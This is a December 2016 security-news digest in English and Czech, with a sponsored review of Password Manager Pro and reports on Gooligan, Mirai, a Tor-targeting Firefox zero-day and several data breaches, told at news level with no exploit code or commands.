Password Manager Pro — Easiest Way to Keep Enterprises Secure
1.12.2016 thehackernews Safety
Recent corporate breaches have taught us something important — the average enterprise user is spectacularly bad at choosing good passwords.
As modern enterprise is becoming a hybrid organization with infrastructure spread across on-premises data centers as well as in the cloud, security of information, applications, and assets has become a paramount concern.
Cyber security is no longer an optional strategy for businesses, where limited visibility into the password practices of employees and ineffective monitoring of privileged credentials could end up an organization with a serious security breach and identity theft.
The first line of defense for any organization or company is passwords, but most organizations grossly underestimate the need to comply with corporate password policies and meet IT regulatory requirements.
Large enterprises have a policy in place that requires end users to choose strong passwords that can withstand dictionary and brute-force attacks, but it comes out to be non-effective, as there are still possibilities that users will go against the policy and pick a simple password.
Even if an organization's IT department forces their employees to choose strong passwords, those strong passwords are stored in text-based files like spreadsheets, or even worse, Word documents.
Not to mention how secure these files are and how able they are to restrict who can access which passwords.
We know that Ignorance is Bliss, but in this case, ignorance can place your enterprise and its data at risk.
In addition to the issues related to creating strong, unique passwords and securely storing them, large enterprises face another important issue - sharing the impersonal administrative accounts among the team members, which can be very challenging. For example, a particular 'administrator' account on Windows will be used by multiple users and all of them will be using the same log in credentials.
The Solution? Password Manager for Enterprise:
Password Manager for Enterprise
Password Manager not only forces one to have strong, unique passwords, but also remembers on your behalf, determines when those passwords have to change, and includes an admin console for controlling all passwords and access to critical services within the enterprise.
I'm impressed with ManageEngine's privileged password management solution — Password Manager Pro that already has VMWare, Walmart, EMC2, and NASA on its customer list.
Password Manager Pro (PMP) is specially designed for enterprise teams and provides a complete solution to control, manage, monitor, and audit the entire lifecycle of privileged access, helping them detect suspicious events in real-time.
Password Manager Pro encrypts and stores all your sensitive data in a centralized vault, including passwords, documents, and digital identities, which are then retrieved through a Web interface.
Administrators can consolidate all the passwords, create an inventory, define password policy, set password expiration, and share passwords among authorized users by granting them exclusive privileges or temporary access.
Deploying Password Manager Pro is easy, as it only takes a few minutes for the web-based management software to install its database and web-server, which is available for Windows and Linux.
However, users can access their portal through mobile apps or browser extensions from any device, including Android, iOS, and Windows.
In a single package, Password Manager Pro offers three solutions:
1. Privileged Account Management
Password Manager Pro
Once deployed, Password Manager Pro automatically discovers all IT assets in your network and lists all the privileged accounts associated with them, which enables administrators to quickly secure all the privileged identities by enforcing password management best practices.
This includes the use of strong passwords, securing sensitive data and passwords with AES 256-bit strong encryption, and securely sharing administrative passwords across your organization based on need, with granular access restrictions.
Most importantly, the Password Manager Pro is also designed to automate the password reset and synchronization process across the entire enterprise for a broad range of target systems.
This centralized and enterprise-wide 'Automated Password Resets' feature helps IT administrators get rid of unchanged passwords and protect all sensitive resources from unauthorized access.
In other words, Password Manager Pro allows IT administrator to reset passwords when required or automatically randomizes through scheduled tasks in order to ensure usage of strong passwords and periodic resets by creating and enforcing strict password policies.
2. Remote Access Management
One of the outstanding features of Password Manager Pro is its ability to help administrators launch a direct connection with all remote devices, including those in remote data centers, with just one click from the product's GUI.
With its secure gateways, Password Manager Pro helps you provide remote access to your IT resources to employees and third-party contractors without even disclosing the passwords in plain-text. In other words, PMP enables remote login to devices without sharing passwords at all!
From its web-interface, authorized users can directly launch RDP, SSH, Telnet, and SQL console sessions, wherein all connections will be tunneled through Password Manager Pro's server and require no direct connectivity between the user device and remote host.
This feature has obvious advantages like saving time that usually used to copy/paste passwords from the document, and increasing accountability as PasswordManager Pro tracks access and usage of passwords.
3. Privileged Session Management
The remote connections to devices launched from Password Manager Pro's GUI can be closely monitored through PMP's Privileged Session Manager. All actions done by the users during the privileged session are video recorded and stored for forensic audits. The video records can be played back anytime, to trace actions to users.
Password Manager Pro also includes a session shadowing feature that offers session recording capabilities to real-time monitoring of sensitive privileged sessions launched by other users.
If any suspicious activity is discovered, administrators can immediately terminate sessions in real time, giving admins complete control over privileged sessions.
One can also enable two-factor authentication (2FA) and mobile access for authorized users or groups.
How to Get Password Manager Pro?
Password Manager Pro supports several different user access roles including super admin, admin, and regular password users. An online demo of Password Manager Pro is available here, in case you want to have a quick look to the application.
Besides this, ManageEngine Password Manager Pro is now available in MSP edition as well, which is specially designed for the Managed Service Providers who manages the IT and network infrastructure of their customers.
ManageEngine's Password Manager Pro MSP Edition allows businesses to manage administrative passwords of their clients separately from a single management console or offer Password Management Service to them.
So, if ManageEngine Password Manager Pro fits for your organization, you can give it a try. Pricing depends on the level, number of administrators and language.
The cost varies widely, from the annual subscription of $495 for Standard edition, Single-language, and 2-admin (the number of users is unlimited) to $19,995 for an Enterprise edition, Multi-language, 200-admin, perpetual license.
All editions of ManageEngine Password Manager Pro can be downloaded (Windows/Linux) directly from the ManageEngine official website.
To understand how Password Manager Pro helps mitigate security risks related to privileged access, you can simply download the eBook for free.

More than 1 Million Google accounts hacked by Gooligan Android Malware
1.12.2016 securityaffairs Android

Experts from the security firm CheckPoint discovered a new Android malware dubbed Gooligan that has already compromised more than a million Google Accounts.
Another malware, dubbed Gooligan, is threatening Android users. The Android malware has already compromised more than 1 Million Google accounts.
The Gooligan Android malware roots vulnerable Android devices in the attempt of stealing email addresses and authentication tokens stored on them.

The stolen information are used by crooks to hijack victims’ Google account and access sensitive data from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite.

“The attack campaign, named Gooligan, breached the security of over one million Google accounts. The number continues to rise at an additional 13,000 breached devices each day.” reported CheckPoint.

“Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play, Gmail, Google Photos, Google Docs, G Suite, Google Drive, and more.”

Experts from the security firm CheckPoint have discovered dozens of legitimate-looking Android apps containing the Gooligan malware. These mobile apps were available for the download on third-party stores, but experts also highlighted that the malware could be downloaded users directly by tapping malicious links embedded in malicious messages.


Once the malware is installed it start sending device information and stolen data to the C&C server.

“Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),” added the researcher.

“These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user. If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely. If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.”

Experts from CheckPoint security confirmed that older versions of the Android operating system are affected by the issue, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) (roughly 74% of Android devices currently in use).


The crooks could rapidly monetize their efforts because Gooligan generates revenues by fraudulently buying and installing apps from the official Google Play Store and rating them and writing reviews on behalf of the phone’s owner. The malicious code also installs adware on the victims’ mobile devices.

If you fear being one of the victims of the Gooligan malware be free to use an online tool published by Check Point, the Gooligan Checker, that allows users to check if the Android device has been infected. It is very simple, just open the ‘Gooligan Checker’ and enter your Google email address.
If your device is infected you need to Re-Flash your device running a clean installation of Android OS.

Thousands of UK National Lottery player accounts compromised
1.12.2016 securityaffairs Crime

Roughly 26,500 accounts of the UK National Lottery players were accessed by cybercriminals, authorities are investigating the case.
According to the operator Camelot, roughly 26,500 accounts of the UK National Lottery players were accessed by cybercriminals.

The security breach was spotted on November 28th during a routine online security monitoring.

“We do not hold full debit card or bank account details in National Lottery players’ online accounts and no money has been taken or deposited,” added the operator.

“However, we do believe that this attack may have resulted in some of the personal information that the affected players hold in their online account being accessed.”

The operator Camelot excludes that its systems were compromised by hackers, its experts believe that that login credentials had been stolen elsewhere. Players affected have been alerted by the operator via email.

“We regret to inform you that your account has been subject to an unauthorized login.” reads the email. “However, please be assured that we don’t hold full bank account details.. and no money has been deposited or withdrawn from your account”.


In response to the security breach, the operator suspended the accounts that were accessed by the crooks and the passwords were reset.

“Other players reacted in anger on Twitter after being alerted of their accounts being compromised, with one user, Richard C writing: “My account has been potentially breached. Not good at all.”” reported ESET.

29 Nov
Richard C @rnc66
Well this is a worry @TNLUK
The National Lottery ✔ @TNLUK
@rnc66 Hi, if you would like to discuss this email please contact us using the details included within it. Thanks, Charles
21:41 - 29 Nov 2016
Re 1 1 Mi piace
The UK Information Commissioner’s Office is investigating the incident.

“We are aware of this incident and we have launched an investigation,” confirmed an ICO spokesperson.

“The Data Protection Act requires organizations to do all they can to keep personal data secure – that includes protecting it from cyberattacks. Where we find this has not happened, we can take action.”

Více než milion účtů Google ohroženo novým malwarem Gooligan

1.12.2016 SecurityWorld Android
Check Point Software odhalil novou variantu malwaru pro Android, která narušila bezpečnost více než milionu účtů Google.

Nová malwarová kampaň Gooligan rootuje zařízení se systémem Android a krade e-mailové adresy a uložené ověřovací tokeny. S těmito informacemi mohou útočníci získat přístup k citlivým uživatelským datům z Gmailu, Fotek Google, Dokumentů Google, Google Play a G Suite.

„Tato krádež informací o více než miliónu účtů Google nemá obdoby a je to další etapa kybernetických útoků,“ říká Daniel Šafář, Country Manager pro Českou republiku a region CZR ve společnosti Check Point. „Vidíme posun ve strategii hackerů, kteří nyní cílí na mobilní zařízení a snaží se z nich dostat citlivé informace.“

Klíčová zjištění:

Kampaň infikuje 13 000 zařízení každý den a jako první způsobila root více než 1 milionu zařízení.
Stovky e-mailových adres jsou spojeny s podnikovými účty z celého světa.
Gooligan cílí na zařízení se systémem Android 4 (Jelly Bean, KitKat) a 5 (Lollipop), které představují téměř 74 % aktuálně používaných zařízení Android.
Jakmile útočníci získají kontrolu nad zařízením, generují tržby podvodným instalováním aplikací z Google Play a hodnotí je jménem obětí.
Každý den Gooligan instaluje na kompromitovaných zařízeních minimálně 30 000 aplikací, což je více než 2 miliony aplikací od začátku kampaně.

Malware ohrozil i účty a zařízení českých uživatelů.

Check Point s informacemi o kampani okamžitě informoval bezpečnostní tým společnosti Google.

„Společně jsme pracovali na pochopení situace a odpovídajících krocích. V rámci naší trvalé snahy chránit uživatele před malwarem z rodiny Ghost Push jsme přijali řadu opatření, abychom naše uživatele chránili a vylepšili celkové zabezpečení ekosystému Android,“ říká Adrian Ludwig, ředitel zabezpečení systému Android ve společnosti Google. Google mimo jiné kontaktoval postižené uživatele a zrušil jejich tokeny, odstranil aplikace spojené s malwarovou rodinou Ghost Push z Google Play a přidal nové vrstvy ochrany do technologie ověřování aplikací.

Mobilní výzkumný tým společnosti Check Point poprvé zaznamenal Gooliganův kód ve škodlivé aplikaci SnapPea minulý rok. V srpnu 2016 se objevila nová varianta malwaru a od té doby infikoval denně minimálně 13 000 zařízení. Asi 57 % z těchto zařízení se nachází v Asii a asi 9 % v Evropě.

Unikly informace o stovkách e‑mailových adres spojených se společnostmi z celého světa. K infikování zařízení dojde, pokud uživatel stáhne a nainstaluje Gooliganem nakaženou aplikaci na zranitelném zařízení se systémem Android nebo klikne na nebezpečný odkaz ve zprávě použité k phishingovému útoku.

Check Point nabízí bezplatný online nástroj, který umožňuje uživatelům systému Android zkontrolovat, jestli byla narušena bezpečnost jejich účtu.

„Pokud byl váš účet napaden, je nutné provést čistou instalaci operačního systému na vašem mobilním zařízení. Tento komplexní proces se nazývá ‚flashování‘ a doporučujeme vypnout přístroj a zařízení donést k certifikovanému technikovi nebo vašemu poskytovateli mobilních služeb, protože celá operace vyžaduje odborné provedení,“ dodává Šafář.

Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware
30.11.2016 thehacknews Android

If you own an Android smartphone, Beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day.
Dubbed Gooligan, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them.
With this information in hands, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite.
Researchers found traces of Gooligan code in dozens of legitimate-looking Android apps on 3rd-party app stores, which if downloaded and installed by an Android user, malware starts sending your device’s information and stolen data to its Command and Control (C&C) server.
"Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153)," researchers said in a blog post.
"If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely."
According to CheckPoint security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) is most at risk, which represents nearly 74% of Android devices in use today.
"These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user," researchers added.
Once hack into any Android device, Gooligan also generates revenues for the cyber criminals by fraudulently buying and installing apps from Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue.
How to check if your Google account has been compromised with this malware?
Check Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open ‘Gooligan Checker’ and enter your Google email address to find out if you've been hacked.
If you found yourself infected, Adrian Ludwig, Google's director of Android security, has recommended you to run a clean installation of the operating system on your Android device.
This process is called 'Flashing,' which is quite a complicated process. So, the company recommends you to power off your device and approach a certified technician or your mobile service provider in order to re-flash your device.

Data on Europol terrorism investigations accidentally leaked online
30.11.2016 securityaffairs Cyber
According to a Dutch television program data on several investigations into the terrorism groups conducted by the Europol were accidentally leaked.
According to Dutch television program Zembla, data on several investigations into the terrorism groups conducted by the Europol were accidentally leaked online. According to the program, the dossier contained information about 54 different police investigations, including the names and telephone numbers of suspects.

“Information on numerous international investigations into terrorism groups compiled by Europol was accidentally left online, unguarded by any password, a Dutch television program reported on Wednesday.” reported the Reuters Agency. “Europol, which helps European Union national police organizations cooperate, could not immediately be reached for comment. The television program Zembla cited the Europol’s adjunct director Wil van Gemert as acknowledging the incident.”

The television program cited the Europol’s adjunct director Wil van Gemert as acknowledging the incident.


The leak was caused by a former employee who took dossiers home, violating the rules of conduct of the Europol. The man transferred the precious information on a hard drive, but unfortunately, he was not aware that the storage was connected to the Internet and it was accessible to anyone without any restriction.

Zembla did not reveal any information contained in the dossier.

“Van Gemert was quoted saying it did not appear that the dossier had been seen by anyone other than Zembla researchers, but he could not rule it out.” continues the Reuters.

“This affects confidentiality and that is why we immediately set up an investigation to see how this could have happened,” declared Gemert.

Gemert explained that some individual included in the dossier may still be under “long-term” active investigation.

“The fact that they were ten years ago, part of an investigation, can still mean that they are part of an investigation,” he added.

Dutch Member of the European Parliament, Sophie in ‘t Veld published the following post on Twetter:

“Huge data leak. Will call for @EU_Commission and @Europol director to come and inform @Europarl_EN.”

Sophie in 't Veld ✔ @SophieintVeld
Huge data leak. Will call for @EU_Commission and @Europol director to come and inform @Europarl_EN …
08:15 - 30 Nov 2016
Photo published for Terrorismedossiers op straat door groot veiligheidslek Europol
Terrorismedossiers op straat door groot veiligheidslek Europol
Het programma Zembla heeft meer dan 700 pagina's aan vertrouwelijke informatie van Europol in handen gekregen. Europol noemt het een "zeer ernstig incident".
18 18 Re 9 9 Mi piace
Below the full statement from the Europol:

“Europol operates state-of-the-art databases and secure communication capabilities for processing and analysing operational and classified information. Europol adheres to the highest standards of data security, including continuous security briefings provided to staff members: State-of-the-art security is the basis for maintaining trust among all the parties that share information and intelligence with and through Europol.

“As for any law enforcement agency processing sensitive information, the design of a robust system cannot completely eliminate human error. Europol has a robust framework in place regarding security clearance measures and sanctions for breaches of security rules.

“A recent case included in a Dutch television programme concerned the breach of an ex-Europol staff member with Europol’s security regime. The concerned former staff member, who is an experienced police officer from a national authority, uploaded Europol data to a private storage device while still working at Europol, in clear contravention to Europol policy.

“A security investigation regarding this case is on-going, in coordination with the respective authorities at national level to which the staff member returned. Current information suggests that the security breach was not ill-intended.

“Although this case relates to Europol sensitive information dating from around 10 years ago, Europolimmediately informed the concerned Member States. As of today, there is no indication that an investigation has been jeopardised, due to the compromise of this historical data. Europol will continue to assess the impact of the data in question, together with concerned Member States.

“Human error is the weakest link when it comes to the intersection of staff, data, and technology. Although this risk can never fully be ruled out, Europol’s systems and the security training offered to Europol staff are constantly reviewed. Europol is serious about maintaining the trust from EU Member States and partners.”

The terrorism is a principal threat to the Western countries, for this reason, the European State members announced the creation of a new European counter-terrorism centre early this year.

The centre aims to improve information-sharing among national law enforcement bodies involved in the investigation on terrorism activities. The creation of the centre represents an urgency after the tragic events in Paris.

The new centre is located at the Europol’s headquarters in the Hague, it is tasked to monitor any activity online conducted by extremist groups, investigating how these groups exploit the Internet for their operations.

Hackeři ukradli statisíce hesel. Z druhého největšího erotického webu

30.11.2016 Novinky/Bezpečnost Hacking
Zbystřit by měli pánové a dámy, kteří navštěvují erotické stránky. Druhý největší web s lechtivou tématikou totiž napadli počítačoví piráti. Z databáze se jim podařilo odcizit přístupové údaje několika stovek tisíc uživatelů.
Server Xhamster je po Pornhubu druhým nejoblíbenějším serverem s erotickou tématikou na internetu. Dokonce patří mezi stovku nejnavštěvovanějších stránek na celém světě, patří mu 76. místo.

Právě proto jsou informace o úniku dat uživatelů tak znepokojující. Server Motherboard upozornil na to, že útočníci se dostali k přihlašovacím údajům bezmála 400 000 uživatelů.

K úniku mělo údajně dojít v průběhu letošního roku. To však zatím zástupci Xhamsteru oficiálně nepotvrdili. Podle serveru Motherboard však byla hesla na serveru špatně zašifrovaná, a tak hacker či hackeři neměli s odcizením citlivých dat příliš mnoho práce.

Raději změnit heslo
Uživatelé služby Xhamster by si tak z preventivních důvodů měli změnit heslo. A to i na dalších internetových službách, kde používají stejné přihlašovací údaje. Tím prakticky eliminují riziko, že se díky uniklému heslu počítačoví piráti dostanou i na jejich další služby.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako například „heslo”) nebo pouhou posloupností číslic.

400 miliónů odcizených hesel
V poslední době jde už o několikátý velký únik přihlašovacích údajů, při kterém se počítačoví piráti zaměřili na erotické servery. 

Před dvěma týdny ses například ukázalo, že z lechtivých serverů bylo odcizeno rekordních 400 miliónů hesel. Podle serveru LeakedSource se únik přihlašovacích údajů týká serverů,, a

K samotnému útoku mělo dojít přitom už v minulém měsíci, detaily však byly prozrazeny až předminulý týden.

K tak velkému balíku hesel se počítačoví piráti dostali kvůli chybě přímo na serveru Tu využili k tomu, aby se dostali na servery provozovatelů, kteří stojí i za dalšími zmiňovanými weby.

Nebezpečný virus napadl milión zařízení. Každý den infikuje tisíce dalších

30.11.2016 Novinky/Bezpečnost Viry
Na masivní narušení bezpečnosti uživatelů, kteří používají přístroje s operačním systémem Android, upozornili ve středu bezpečnostní experti ze společnosti Check Point. Více než milión napadených strojů má na svědomí nezvaný návštěvník zvaný Goolian. Prostřednictvím něj navíc kyberzločinci každý den infikují tisíce dalších přístrojů.
Goolian se šíří internetem bez nadsázky jako lavina. Jde o velmi nebezpečný virus, protože díky němu mohou kyberzločinci rootovat zařízení s Androidem. To jinými slovy znamená, že chytré telefony a tablety mohou ovládat na dálku úplně stejně, jako kdyby je měli zrovna v ruce.

Na napadeném zařízení pak tento zákeřný virus krade e-mailové adresy a uložené ověřovací tokeny. S těmito informacemi mohou útočníci získat přístup k citlivým uživatelským datům z různých služeb Googlu – z Gmailu, Fotek Google, Dokumentů Google, Google Play i z G Suite.

Cílí na mobilní zařízení
Přesně takovýmto způsobem se podařilo útočníkům získat důvěrné informace o statisících účtů. „Tato krádež informací o více než miliónu účtů Google nemá obdoby a je to další etapa kybernetických útoků,“ řekl Daniel Šafář, zástupce společnosti Check Point pro Českou republiku.

Ten zároveň upozornil, že nově objevená virová kampaň, ve které hraje Goolian hlavní roli, jasně ukazuje trendy mezi počítačovými piráty. „Vidíme posun ve strategii hackerů, kteří nyní cílí na mobilní zařízení a snaží se z nich dostat citlivé informace,“ prohlásil Šafář.

Podle něj jsou kyberzločinci v šíření tohoto nezvaného návštěvníka navíc velmi úspěšní. Každý den totiž tento malware infikuje na 13 000 zařízení. Cílí přitom na Android ve verzích 4 a 5, které jsou aktuálně nejrozšířenější.

Inkasují peníze z nainstalovaných aplikací
„Jakmile útočníci získají kontrolu nad zařízením, generují tržby podvodným instalováním aplikací z Google Play a hodnotí je jménem obětí. Každý den Gooligan instaluje na kompromitovaných zařízeních minimálně 30 000 aplikací, což je více než 2 milióny aplikací od začátku kampaně,“ konstatoval Šafář.

Bezpečnostní experti Check Pointu již na novou malwarovou kampaň upozornili bezpečnostní tým společnosti Google. Ten již dotčené uživatele kontaktoval a upozornil je na to, že mohl být jejich účet kompromitován.

Zároveň pracovníci Googlu odstranili aplikace spojené s touto virovou nákazou z oficiálního obchodu Google Play. I prostřednictvím něj se totiž mohli uživatelé nakazit.

Anonymous Hacktivist 'Barrett Brown' Released From Prison
30.11.2016 thehacknews Crime
Barrett Brown, a journalist, formerly served as an unofficial spokesman for the hacktivist collective Anonymous, finally walked free from prison on Tuesday morning after serving more than four years behind bars.
The Dallas-born investigative journalist was arrested in 2012 from his home while he was in the middle of an online chat after posting s and YouTube video threatening revenge against an FBI agent.
Brown, 35, initially attracted the law enforcement attention in 2011 when he shared a hyperlink to an IRC (Internet Relay Chat) channel where Anonymous members were distributing stolen information from the hack at security think tank Strategic Forecasting or Stratfor.
The hack allegedly exposed 200 gigabytes of data, which included email addresses and credit card information from Stratfor clients, including the US Army, US Air Force, and Miami Police Department.
Originally facing sentence to more than 100 years in prison, Brown was convicted in January 2015 under a plea agreement with prosecutors to almost five years in jail and nearly $900,000 in restitution and fines.
The two and a half years he has spent in pretrial confinement after his arrest were credited toward his total prison sentence.
Brown eventually pleaded guilty to three federal counts of obstructing a search warrant, making Internet threats and being an accessory to unauthorized access of a protected computer.

According to the Department of Justice, sharing the hyperlink was a crime because "by transferring and posting the hyperlink, Brown caused the data to be made available to other persons online, without the knowledge and authorization of Stratfor and the card holders."
On Tuesday, Brown was released from the Three Rivers Federal Correctional Institution in San Antonio, Texas, where he continued his work as a writer over the past year.
WikiLeaks Publishes 60,000 Emails From Contractor HBGary
On his release five months before the scheduled date, Former National Security Agency (NSA) subcontractor Edward Snowden ed his reaction, saying:
"Jailed since 2012 for his investigations, #BarrettBrown has finally been released from prison. Best of luck in this very different world."
Meanwhile, the whistleblower site WikiLeaks also published more than 60,000 emails from US private intelligence firm HBGary to celebrate Brown's release.
Hacktivist collective Anonymous initially obtained the emails in February 2011, but WikiLeaks published them in the form of a searchable database on Tuesday. Among other things, the leaked emails discussed targeting journalists and governments.

The code of a Firefox Zero-Day Exploit used to unmask Tor Users is online
30.11.2016 securityaffairs

A zero-day exploit in the wild has been used by threat actors to de-anonymize Tor users by executing malicious code on Windows machines.
The news is disconcerting and confirms the existence of a zero-day exploit in the wild that’s being used by threat actors to de-anonymize Tor users by executing malicious code on their machine. The zero-day exploit targets Tor users and also other netizens using the Firefox browser.

The zero-day vulnerability was first mentioned on the official Tor website, a blog post quoted a Javascript exploit that is actively exploited in the wild to unmask Tor Browser users.

“This is an Javascript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it’s getting access to “VirtualAlloc” in “kernel32.dll” and goes from there. Please fix ASAP. I had to break the “thecode” line in two in order to post, remove ‘ + ‘ in the middle to restore it.” reads the post.

Roger Dingledine, the notorious Tor co-founder, confirmed the zero-day and announced that the Mozilla security team is already working to fix it.

The zero-day is a memory corruption vulnerability that could be exploited to execute malicious code on Windows Machines.

zero-day flaw

The security researcher Raylee (@TheWack0lian) explained that the payload used in the recent wave of attacks is quite similar to the one used by law enforcement in 2013 to de-anonymize the users of a child pornography site hosted on Freedom Hosting.

“It’s basically almost EXACTLY the same as the payload used in 2013,” TheWack0lian told Ars. “It exploits some vuln that executes code very similar to that used in the 2013 Tor browser exploit. Most of the code is identical, just small parts have changed.”

According to the security researcher Joshua Yabut the zero-day exploit triggers a heap overflow vulnerability that requires JavaScript to be enabled on the target machine.

The zero-day exploit code works on various versions of the Firefox browser, from 41 to 50, the code is able to target all these versions a circumstance that suggests that its authors have improved the malicious code across the time.

As usual, the public disclosure of the Javascript code could allow threat actors in the wild to use it to track Tor users.

Waiting for a patch from Mozilla, users avoid relying on Tor to protect their anonymity.

As usual, it is strongly suggested to disable JavaScript.

Hacking – German politicians fear Russian interference in the next election
30.11.2016 securityaffairs Hacking
German politicians fear Russian interference in the next election after the cyber attack that hit at least 900,000 routers.
During the weekend an improved version of the Mirai Botnet caused serious connectivity problems to at least 900,000 routers of the Deutsche Telekom.

Just after the attack, some experts speculated the involvement of Russian hackers behind the botnet that powered it.

The Government of Berlin fears possible interference of Russian nation-state hackers with the 2017 German election.

The attack demonstrated once again how much vulnerable it modern society to cyber threats, which then can also interfere with a political election. German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US Presidential election is unleashing a domino effect and insinuating the fear in governments.

“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”

Russian Interference Bundestag

State-sponsored hackers or non-nation state actor?

Even if the attack was launched by Russian hackers its attribution still remains the biggest problem to solve. Governments need to properly manage such kind of situation through the definition of norms of state behavior that can deal with cyber attacks launched by both categories of threat actors.

The Germany’s Interior Minister Thomas de Mazière expressed a great concern for explicitly blaming Moscow.

“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” Maizière declared at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.

The new president of German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers can try to launch cyber attacks in the attempt to “delegitimize the democratic process” in the country.

“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported

In the past German infrastructure were targeted several times by foreign hackers. In June 2015, the German Government announced that hackers who breached the Bundestagsystems in May have also stolen data from targeted network. A spokeswoman for the Bundestag confirmed that unknown hackers stole data during the cyber attack, the investigators have uncovered several data leaks.
The daily Der Spiegel speculated that the Russian Government was involved in the attack occurred in May 2015. The news agency reported the opinion government representatives close to the Bundestag’s tech department.

“Behind the Cyber attack on the data network of the German Bundestag experts suspect Russian professional hackers. The SPIEGEL ONLINE learned from multiple sources familiar with the case. Thus, the German security authorities are now available clear indications that an authorship Russian cyber spies – point – perhaps a secret.” states the Der Spiegel website.

The attackers, likely Russian state-sponsored hackers, used a sophisticated strain of malware to violate the Bundestag network and syphon sensitive data. The experts that analyzed the malicious have found it similar to the malware used in a previous attack against on a German Government network occurred in 2014.

German intelligence is aware of cyber espionage campaigns against its political leaders.
“We have indications that hacker groups from Russia are active in this area, but we also know what foreign intelligence services are capable of,” Social Democratic Bundestag deputy Lars Klingbeil told Deutsche Welle. “For me this shows that we really need to protect ourselves structurally. Looking ahead to the national elections next year, this could become a major issue.”

Botnet Mirai má další oběť, v Německu odstavil od internetu 900 tisíc uživatelů
30.11.2016 Živě.cz
V neděli večer postihl Německo rozsáhlý výpadek internetu, při kterém zůstalo bez připojení 900 tisíc zákazníků poskytovatele Deutsche Telekom. Výpadky pociťovali také operátoři v dalších zemích, kde uživatelé hlásili nedostupnost služeb. Nyní již víme původ útoku – byl jim malware Mirai, který se na konci října postaral o nedostupnost Twitteru nebo Youtube masivním útokem na poskytovatele DNS, společnost Dyn. Využívá k tomu zařízení spadající do kategorie IoT – routery, bezpečnostní kamery, ale třeba i bezdrátové chůvičky.

Mirai se v poslední verzi naučil využívat jednu ze zranitelností routerů, která na ně umožňuje útočníkům instalovat škodlivý kód, v tomto případě je cílem zapojení do botnetu. Podle webu Badcyber k tomu používá servisní protokol TR-064, který je providerům k dispozici pro vzdálenou správu. Vedle zpomaleného připojení s sebou útok na router často přinese také jeho pád, a tudíž kompletní odpojení uživatele od internetu. Právě to způsobilo nedostupnost internetu u statisíců uživatelů po celém světě.

Deutsche Telekom radí zákazníkům, kteří pociťují zpomalené připojení restart routeru – škodlivý kód je uložen pouze v RAM. Zároveň přišel s opravou, která aktualizací firmwaru zabezpečí zařízení proti tomuto typu útoku. Nákaza se týkala především routerů výrobce Arcadyan, jenž dodává routery mnoha providerům po celém světě.

Mirai má nový cíl: útočí na routery, cílů má 5 milionů

30.11.2016 BotNet
Botnet Mirai už napáchal mnoho škod, ale jeho řádění ještě zdaleka nekončí. Naučil se novým věcem a útočí na vzdálený management routerů, ke kterému by měli mít přístup jen operátoři.
Botnet jménem Mirai se v posledních týdnech stal několikrát cílem zájmu odborných i populárních médií. Tento zájem byl způsoben především skutečností, že Mirai byl zdrojem historicky prozatím nejsilnějších DDoS útoků. Posledním takovým útokem byl distribuovaný útok cílený na poskytovatele DNS služeb Dyn, k němuž došlo ve druhé polovině minulého měsíce a který způsobil nedostupnost mnoha webových služeb, včetně Spotify a Twitteru, pro většinu lidí připojených k internetu.

V době tohoto útoku bylo dle většiny odhadů do botnetu zapojeno přibližně 100 000 zařízení – většinou routerů, kamer a dalších IoT zařízení – jeho aktuální velikost by však dle některých zdrojů mohla být i několikanásobně vyšší.

Čtěte: Když „chytré“ kamery útočí: rozbor současných DDoS útoků

Botnety bývají nejčastěji vytvářeny buď za účelem jejich využití samotným „vlastníkem“, nebo pro získání finančních prostředků z jejich pronájmu třetí straně (v obou případech např. k provádění DDoS útoků). Dle některých zdrojů je aktuální verze Mirai (zdrojové kódy původního malwaru, který zařízení do botnetu připojoval, byly volně publikovány na internetu a dále upravovány) svými provozovateli využívána druhým uvedeným způsobem. V nedávné době byl škodlivý kód, který připojuje zařízení do Mirai doplněn o nový vektor šíření, který mu umožňuje infikovat některé typy routerů, používaných nejčastěji domácnostmi a malými podniky pro připojení k internetu.

